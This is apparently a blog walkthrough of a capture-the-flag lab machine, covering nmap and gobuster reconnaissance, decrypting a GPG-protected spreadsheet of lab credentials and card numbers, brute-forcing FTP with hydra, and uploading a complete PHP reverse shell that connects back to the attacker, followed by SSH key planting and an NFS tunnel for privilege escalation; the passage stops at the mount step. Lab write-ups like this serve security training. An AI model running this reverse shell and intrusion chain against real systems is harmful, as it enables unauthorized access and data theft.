.png)
5 months ago
42 BOOK THIS SPACE FOR AD
ARTICLE AD
Never step back. In this article, we will use various cyber security tools within a complex thought system to infiltrate the machine in front of us.
This new article, which will improve your penetration skills in a laboratory environment scenario ranging from XLSX to FTP, will give you many new capabilities.
Warm up the keyboards, punks!
You know what we do as the first step. Save the values you will use most as constant values on the shell. This reduces process complexity and speeds up your process.
Now let’s send a standard ping to the target and check the connection.
Machine is active. Let’s save the target machine in our /etc/hosts file, this will allow us to use some tools. This value will be recorded in local DNS.
Again ping to control.
We are ready!
It’s time to Nmap. We must discover open doors and strengthen our attack scenario: nmap -Pn -sV -sC -oA nmap_results/target_site -A -T4 --script=vuln $target_ip
-Pn: Disables host discovery, treating all hosts as online. This is useful when ping requests are blocked.-sV: Enables version detection to determine the version of services running on open ports.-sC: Runs a set of standard scripts when scanning, equivalent to --script=default.-oA nmap_results/target_site: Saves the scan results in three formats (.nmap, .gnmap, and .xml) with the base name nmap_results/target_site.-A: Enables OS detection, version detection, script scanning, and traceroute.-T4: Sets the timing template to 4 (Aggressive), which speeds up the scan.--script=vuln: Runs vulnerability detection scripts.Patience is important. The result of this command provides you with evidence.
We have beautiful treasures in our hands. We discovered that ports 21 (FTP), 22 (SSH) and 80 (HTTP) were open, and we also obtained operating system information along with version information.
We also added a saving parameter to the command so that you can examine this output in detail and send special queries when necessary. You can check /nmap_results/target_site .
When you discover that FTP is turned on, you need to check whether it allows “anonymous” passwordless connection requests.
Use it: nmap -Pn -oN ftp_result.txt --script=ftp-anon -p 21 $target_ip
FTP doesn’t seem to have “anonymous” login allowed. It is necessary to make sure manually.
It wants authority. We must try another method.
Let’s conduct exploit research on the versions. We have:
vsftpd 3.0.3OpenSSH 8.0Apache httpd 2.4.37Nmap has given us a few details before, but we will show you how to do exploit research in a different way.
As you can see, we have some evidence and potential exploit methods. Now let’s download a script as an example: searchsploit -m openbsd/dos/41278.txt
We saved it to our local, this is a “DoS” method. Check it.
You should read the instructions here thoroughly, it has many advantages in real scenarios.
First, it suggested that we check with the following command: (sleep 1; while true;do echo R;done) | openssl s_client -connect <target_ip>:<target_port>
It also has PoC script.
You can save it and try to run.
We showed this as an example. We will not proceed with this method.
Now let’s take another step and look at the structure running on HTTP.
In some scenarios, examining the source code will provide you with evidence. Believe us, sometimes a lot of information can be included during development, from passwords to some system notes. Keep this in mind.
There are some interesting points. It is useful to keep these in a corner.
We need to go to the directory discovery phase and explore other pages: gobuster dir -w $wordlist_dir -u ourtargetsite.thm -r -d
dir: The mode indicating that you're brute-forcing directories and files.-w $wordlist_dir: Specifies the path to the wordlist that gobuster will use.-u ourtargetsite.thm: Specifies the target URL. Here, ourtargetsite.thm is the domain of the target site.-r: Follows redirects.-d: Check backups filesAdd this command to your arsenal. Their answers will satisfy you.
We discovered the /backups endpoint. The name is quite eye-catching and we need to follow this path.
Interesting… It looks like we discovered backup files. Download this to your local without any hesitation.
Extract it now.
We get two file a XLSX file encrypted with GPG and a private key used to encrypt the file. We are heading towards interesting points.
An XLSX file encrypted with GPG (GNU Privacy Guard) is a Microsoft Excel spreadsheet that has been secured using GPG encryption. GPG is a tool for secure communication that uses public-key cryptography to encrypt and decrypt files and communications.
Steps to decrypt:
Ensure GPG is Installed: Just like for encryption, ensure GPG is installed on your system.Import GPG Keys: If you received the private key from someone, import it: gpg --import priv.keyWe are successful. Check this file.
We have:
Customer Name Username Password Credit card number CVCPar. A. Doxx paradox ShibesAreGreat123 4111 1111 4555 1142 432
0day Montgomery 0day OllieIsTheBestDog 5555 3412 4444 1115 642
Muir Land muirlandoracle A11D0gsAreAw3s0me 5103 2219 1119 9245 737
Note that. After this stage, the system we are facing does not have much of a chance.
Save these values as usernames_target.txt and passwords_target.txt to use.
We will use hydra tool to brute: hydra -L usernames_target.txt -P passwords_target.txt ftp://10.10.130.5
We will obtain possible login information.
We got that!
Now connect.
We’ve got the connection, now run a few sample commands.
Pay attention to file permissions. These may be useful to you.
Let’s create a .php file locally and add shell code to it.
You can use this code:
<?phpset_time_limit (0);
$VERSION = "1.0";
$ip = 'YOUR_MACHINE_IP'; // CHANGE THIS
$port = 'YOUR_PORT'; // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;
//
// Daemonise ourself if possible to avoid zombies later
//
// pcntl_fork is hardly ever available, but will allow us to daemonise
// our php process and avoid zombies. Worth a try...
if (function_exists('pcntl_fork')) {
// Fork and have the parent process exit
$pid = pcntl_fork();
if ($pid == -1) {
printit("ERROR: Can't fork");
exit(1);
}
if ($pid) {
exit(0); // Parent exits
}
// Make the current process a session leader
// Will only succeed if we forked
if (posix_setsid() == -1) {
printit("Error: Can't setsid()");
exit(1);
}
$daemon = 1;
} else {
printit("WARNING: Failed to daemonise. This is quite common and not fatal.");
}
// Change to a safe directory
chdir("/");
// Remove any umask we inherited
umask(0);
//
// Do the reverse shell...
//
// Open reverse connection
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
printit("$errstr ($errno)");
exit(1);
}
// Spawn shell process
$descriptorspec = array(
0 => array("pipe", "r"), // stdin is a pipe that the child will read from
1 => array("pipe", "w"), // stdout is a pipe that the child will write to
2 => array("pipe", "w") // stderr is a pipe that the child will write to
);
$process = proc_open($shell, $descriptorspec, $pipes);
if (!is_resource($process)) {
printit("ERROR: Can't spawn shell");
exit(1);
}
// Set everything to non-blocking
// Reason: Occsionally reads will block, even though stream_select tells us they won't
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);
printit("Successfully opened reverse shell to $ip:$port");
while (1) {
// Check for end of TCP connection
if (feof($sock)) {
printit("ERROR: Shell connection terminated");
break;
}
// Check for end of STDOUT
if (feof($pipes[1])) {
printit("ERROR: Shell process terminated");
break;
}
// Wait until a command is end down $sock, or some
// command output is available on STDOUT or STDERR
$read_a = array($sock, $pipes[1], $pipes[2]);
$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
// If we can read from the TCP socket, send
// data to process's STDIN
if (in_array($sock, $read_a)) {
if ($debug) printit("SOCK READ");
$input = fread($sock, $chunk_size);
if ($debug) printit("SOCK: $input");
fwrite($pipes[0], $input);
}
// If we can read from the process's STDOUT
// send data down tcp connection
if (in_array($pipes[1], $read_a)) {
if ($debug) printit("STDOUT READ");
$input = fread($pipes[1], $chunk_size);
if ($debug) printit("STDOUT: $input");
fwrite($sock, $input);
}
// If we can read from the process's STDERR
// send data down tcp connection
if (in_array($pipes[2], $read_a)) {
if ($debug) printit("STDERR READ");
$input = fread($pipes[2], $chunk_size);
if ($debug) printit("STDERR: $input");
fwrite($sock, $input);
}
}
fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);
// Like print, but does nothing if we've daemonised ourself
// (I can't figure out how to redirect STDOUT like a proper daemon)
function printit ($string) {
if (!$daemon) {
print "$string\n";
}
}
?>
Now send this to ftp destination. We will use the put command for this.
Before activating this .php file, put your machine in listening mode on the port you specified: nc -nlvp 21000
Now activate the file.
Look at netcat listener.
You are right. We infiltrated the system. Got the shell!
Now let’s look at other potential usernames.
Note that.
First, get a stable shell: python3 -c ‘import pty;pty.spawn(“/bin/bash”)’
Download this LinPeas script to your local, then transfer it to your target. Follow the order:
When the entire process of Linpeas is completed, we will see the following notification:
We have an NFS misconfiguration situation. You can read better here: https://book.hacktricks.xyz/linux-hardening/privilege-escalation/nfs-no_root_squash-misconfiguration-pe
We target it.
We confirm that NFS is running on port 2049: rpcinfo -p | grep nfs
It is okay. There are several approaches here, but mostly only one works.
We tried to mount the NFS share but it failed, because NFS is only accessible to localhost.
Just try to connect via SSH.
Permission denied… We need to generate RSA key pair and put our public key in the ssh’s ‘authorized_keys’ file on the ‘paradox’ target.
Put our public key on the target.
Try to connect again.
Now we have the connection.
Check rpcbind status.
The output will provide detailed information about the status of the rpcbind service. rpcbind is a server that converts RPC program numbers into universal addresses. When an RPC server starts, it tells rpcbind the address at which it is listening and the RPC program numbers it can serve. Clients then contact rpcbind to find out the address of a service and then communicate directly with the service.
We need to have a tunnel: ssh -i sshkey -L 2049:127.0.0.1:2049 paradox@10.10.130.5
We have successfully tunneled the NFS through SSH. We can mount the nfs share locally: sudo mount -t nfs -o port=2049 localhost:/tmp/mount
Remember first you need a file location like this: /tmp/mount , just create if you don’t have.
We have completed this stage as well!
Bengali (Bangladesh) · 
English (United States) ·